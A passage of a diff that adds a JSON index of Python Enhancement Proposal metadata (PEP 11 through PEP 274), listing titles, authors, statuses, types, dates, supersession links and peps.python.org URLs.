null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0011/" + }, + "12": { + "number": 12, + "title": "Sample reStructuredText PEP Template", + "authors": "David Goodger, Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "05-Aug-2002", + "python_version": null, + "post_history": "`30-Aug-2002 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0012/" + }, + "13": { + "number": 13, + "title": "Python Language Governance", + "authors": "The Python core team and community", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "16-Dec-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0013/" + }, + "20": { + "number": 20, + "title": "The Zen of Python", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "19-Aug-2004", + "python_version": null, + "post_history": "22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0020/" + }, + "42": { + "number": 42, + "title": "Feature Requests", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "12-Sep-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0042/" + }, + "100": { + "number": 100, + "title": "Python Unicode Integration", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Mar-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0100/" + }, + "101": { + 
"number": 101, + "title": "Doing Python Releases 101", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "22-Aug-2001", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "102", + "superseded_by": null, + "url": "https://peps.python.org/pep-0101/" + }, + "102": { + "number": 102, + "title": "Doing Python Micro Releases", + "authors": "Anthony Baxter, Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "09-Jan-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "101", + "url": "https://peps.python.org/pep-0102/" + }, + "103": { + "number": 103, + "title": "Collecting information about git", + "authors": "Oleg Broytman", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "01-Jun-2015", + "python_version": null, + "post_history": "12-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0103/" + }, + "160": { + "number": 160, + "title": "Python 1.6 Release Schedule", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "25-Jul-2000", + "python_version": "1.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0160/" + }, + "200": { + "number": 200, + "title": "Python 2.0 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0200/" + }, + "201": { + "number": 201, + "title": "Lockstep Iteration", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "27-Jul-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0201/" + }, + "202": { + "number": 202, + "title": "List Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0202/" + }, + "203": { + "number": 203, + "title": "Augmented Assignments", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jul-2000", + "python_version": "2.0", + "post_history": "14-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0203/" + }, + "204": { + "number": 204, + "title": "Range Literals", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + "python_version": "2.0", 
+ "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0204/" + }, + "205": { + "number": 205, + "title": "Weak References", + "authors": "Fred L. Drake, Jr.", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2000", + "python_version": "2.1", + "post_history": "11-Jan-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0205/" + }, + "206": { + "number": 206, + "title": "Python Advanced Library", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "14-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0206/" + }, + "207": { + "number": 207, + "title": "Rich Comparisons", + "authors": "Guido van Rossum, David Ascher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0207/" + }, + "208": { + "number": 208, + "title": "Reworking the Coercion Model", + "authors": "Neil Schemenauer, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0208/" + }, + "209": { + "number": 209, + "title": "Multi-dimensional Arrays", + "authors": "Paul Barrett, Travis Oliphant", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "03-Jan-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0209/" + }, + "210": { + "number": 210, + "title": "Decoupling the Interpreter Loop", + "authors": "David Ascher", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0210/" + }, + "211": { + "number": 211, + "title": "Adding A New Outer Product Operator", + "authors": "Greg Wilson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0211/" + }, + "212": { + "number": 212, + "title": "Loop Counter Iteration", + "authors": "Peter Schneider-Kamp", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0212/" + }, + "213": { + "number": 213, + "title": "Attribute Access 
Handlers", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0213/" + }, + "214": { + "number": 214, + "title": "Extended Print Statement", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.0", + "post_history": "16-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0214/" + }, + "215": { + "number": 215, + "title": "String Interpolation", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "24-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "292", + "url": "https://peps.python.org/pep-0215/" + }, + "216": { + "number": 216, + "title": "Docstring Format", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "31-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "287", + "url": "https://peps.python.org/pep-0216/" + }, + "217": { + "number": 217, + "title": "Display Hook for Interactive Use", + "authors": "Moshe Zadka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0217/" + }, + "218": { + "number": 218, + "title": "Adding a Built-In Set Object Type", + "authors": "Greg Wilson, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jul-2000", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0218/" + }, + "219": { + "number": 219, + "title": "Stackless Python", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "14-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0219/" + }, + "220": { + "number": 220, + "title": "Coroutines, Generators, Continuations", + "authors": "Gordon McMillan", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "14-Aug-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0220/" + }, + "221": { + "number": 221, + "title": "Import As", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2000", + "python_version": "2.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0221/" + }, + "222": { + "number": 222, + "title": "Web Library Enhancements", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2000", + "python_version": "2.1", + "post_history": "22-Dec-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0222/" + }, + "223": { + "number": 223, + "title": "Change the Meaning of ``\\x`` Escapes", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2000", + "python_version": "2.0", + "post_history": "23-Aug-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0223/" + }, + "224": { + "number": 224, + "title": "Attribute Docstrings", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0224/" + }, + "225": { + "number": 225, + "title": "Elementwise/Objectwise Operators", + "authors": "Huaiyu Zhu, Gregory Lielens", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0225/" + }, + "226": { + "number": 226, + "title": "Python 2.1 Release Schedule", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "16-Oct-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0226/" + }, + "227": { + "number": 227, + "title": "Statically Nested Scopes", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0227/" + }, + "228": { + "number": 228, + "title": "Reworking Python's Numeric Model", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Nov-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0228/" + }, + "229": { + "number": 229, + "title": "Using Distutils to Build Python", + "authors": "A.M. 
Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0229/" + }, + "230": { + "number": 230, + "title": "Warning Framework", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2000", + "python_version": "2.1", + "post_history": "05-Nov-2000", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0230/" + }, + "231": { + "number": 231, + "title": "__findattr__()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0231/" + }, + "232": { + "number": 232, + "title": "Function Attributes", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2000", + "python_version": "2.1", + "post_history": "20-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0232/" + }, + "233": { + "number": 233, + "title": "Python Online Help", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2000", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0233/" + }, + "234": { + "number": 234, + "title": "Iterators", + "authors": "Ka-Ping Yee, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2001", + "python_version": "2.1", + "post_history": "30-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0234/" + }, + "235": { + "number": 235, + "title": "Import on Case-Insensitive Platforms", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Feb-2001", + "python_version": "2.1", + "post_history": "16-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0235/" + }, + "236": { + "number": 236, + "title": "Back to the __future__", + "authors": "Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2001", + "python_version": "2.1", + "post_history": "26-Feb-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0236/" + }, + "237": { + "number": 237, + "title": "Unifying Long Integers and Integers", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 14-Aug-2001, 23-Aug-2001", + "resolution": null, + "requires": null, + 
"replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0237/" + }, + "238": { + "number": 238, + "title": "Changing the Division Operator", + "authors": "Moshe Zadka, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001, 26-Jul-2001, 27-Jul-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0238/" + }, + "239": { + "number": 239, + "title": "Adding a Rational Type to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0239/" + }, + "240": { + "number": 240, + "title": "Adding a Rational Literal to Python", + "authors": "Christopher A. Craig, Moshe Zadka", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2001", + "python_version": "2.2", + "post_history": "16-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0240/" + }, + "241": { + "number": 241, + "title": "Metadata for Python Software Packages", + "authors": "A.M. Kuchling", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Mar-2001", + "python_version": null, + "post_history": "`19-Mar-2001 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "314", + "url": "https://peps.python.org/pep-0241/" + }, + "242": { + "number": 242, + "title": "Numeric Kinds", + "authors": "Paul F. 
Dubois", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Mar-2001", + "python_version": "2.2", + "post_history": "17-Apr-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0242/" + }, + "243": { + "number": 243, + "title": "Module Repository Upload Mechanism", + "authors": "Sean Reifschneider", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2001", + "python_version": "2.1", + "post_history": "20-Mar-2001, 24-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0243/" + }, + "244": { + "number": 244, + "title": "The ``directive`` statement", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Mar-2001", + "python_version": "2.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0244/" + }, + "245": { + "number": 245, + "title": "Python Interface Syntax", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2001", + "python_version": "2.2", + "post_history": "21-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0245/" + }, + "246": { + "number": 246, + "title": "Object Adaptation", + "authors": "Alex Martelli, Clark C. Evans", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2001", + "python_version": "2.5", + "post_history": "29-Mar-2001, 10-Jan-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0246/" + }, + "247": { + "number": 247, + "title": "API for Cryptographic Hash Functions", + "authors": "A.M. 
Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "23-Mar-2001", + "python_version": null, + "post_history": "20-Sep-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0247/" + }, + "248": { + "number": 248, + "title": "Python Database API Specification v1.0", + "authors": "Greg Stein, Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-May-1996", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "249", + "url": "https://peps.python.org/pep-0248/" + }, + "249": { + "number": 249, + "title": "Python Database API Specification v2.0", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Apr-1999", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "248", + "superseded_by": null, + "url": "https://peps.python.org/pep-0249/" + }, + "250": { + "number": 250, + "title": "Using site-packages on Windows", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2001", + "python_version": "2.2", + "post_history": "30-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0250/" + }, + "251": { + "number": 251, + "title": "Python 2.2 Release Schedule", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Apr-2001", + "python_version": "2.2", + "post_history": "14-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0251/" + }, + "252": { + "number": 252, + "title": "Making Types Look More Like Classes", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0252/" + }, + "253": { + "number": 253, + "title": "Subtyping Built-in Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0253/" + }, + "254": { + "number": 254, + "title": "Making Classes Look More Like Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0254/" + }, + "255": { + "number": 255, + "title": "Simple Generators", + "authors": "Neil Schemenauer, Tim Peters, Magnus Lie Hetland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": 
"18-May-2001", + "python_version": "2.2", + "post_history": "14-Jun-2001, 23-Jun-2001", + "resolution": null, + "requires": "234", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0255/" + }, + "256": { + "number": 256, + "title": "Docstring Processing System Framework", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jun-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0256/" + }, + "257": { + "number": 257, + "title": "Docstring Conventions", + "authors": "David Goodger, Guido van Rossum", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": "", + "created": "29-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0257/" + }, + "258": { + "number": 258, + "title": "Docutils Design Specification", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": "256, 257", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0258/" + }, + "259": { + "number": 259, + "title": "Omit printing newline after newline", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jun-2001", + "python_version": "2.2", + "post_history": "11-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0259/" + }, + "260": { + "number": 260, + "title": "Simplify xrange()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jun-2001", + "python_version": "2.2", + "post_history": "26-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0260/" + }, + "261": { + "number": 261, + "title": "Support for \"wide\" Unicode characters", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2001", + "python_version": "2.2", + "post_history": "27-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0261/" + }, + "262": { + "number": 262, + "title": "A Database of Installed Python Packages", + "authors": "A.M. 
Kuchling", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2001", + "python_version": null, + "post_history": "27-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0262/" + }, + "263": { + "number": 263, + "title": "Defining Python Source Code Encodings", + "authors": "Marc-Andr\u00e9 Lemburg, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0263/" + }, + "264": { + "number": 264, + "title": "Future statements in simulated shells", + "authors": "Michael Hudson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2001", + "python_version": "2.2", + "post_history": "30-Jul-2001", + "resolution": null, + "requires": "236", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0264/" + }, + "265": { + "number": 265, + "title": "Sorting Dictionaries by Value", + "authors": "Grant Griffin", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0265/" + }, + "266": { + "number": 266, + "title": "Optimizing Global Variable/Attribute Access", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Aug-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0266/" + }, + "267": { + "number": 267, + "title": "Optimized Access to Module Namespaces", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "23-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0267/" + }, + "268": { + "number": 268, + "title": "Extended HTTP functionality and WebDAV", + "authors": "Greg Stein", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2001", + "python_version": "2.x", + "post_history": "21-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0268/" + }, + "269": { + "number": 269, + "title": "Pgen Module for Python", + "authors": "Jonathan Riehl", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0269/" + }, + "270": { + "number": 270, + "title": "uniq method for list objects", + "authors": "Jason Petrone", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2001", + "python_version": 
"2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0270/" + }, + "271": { + "number": 271, + "title": "Prefixing sys.path by command line option", + "authors": "Fr\u00e9d\u00e9ric B. Giacometti", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0271/" + }, + "272": { + "number": 272, + "title": "API for Block Encryption Algorithms v1.0", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "18-Sep-2001", + "python_version": null, + "post_history": "17-Apr-2002, 29-May-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0272/" + }, + "273": { + "number": 273, + "title": "Import Modules from Zip Archives", + "authors": "James C. Ahlstrom", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Oct-2001", + "python_version": "2.3", + "post_history": "26-Oct-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0273/" + }, + "274": { + "number": 274, + "title": "Dict Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2001", + "python_version": "2.7, 3.0", + "post_history": "29-Oct-2001", + "resolution": null, + 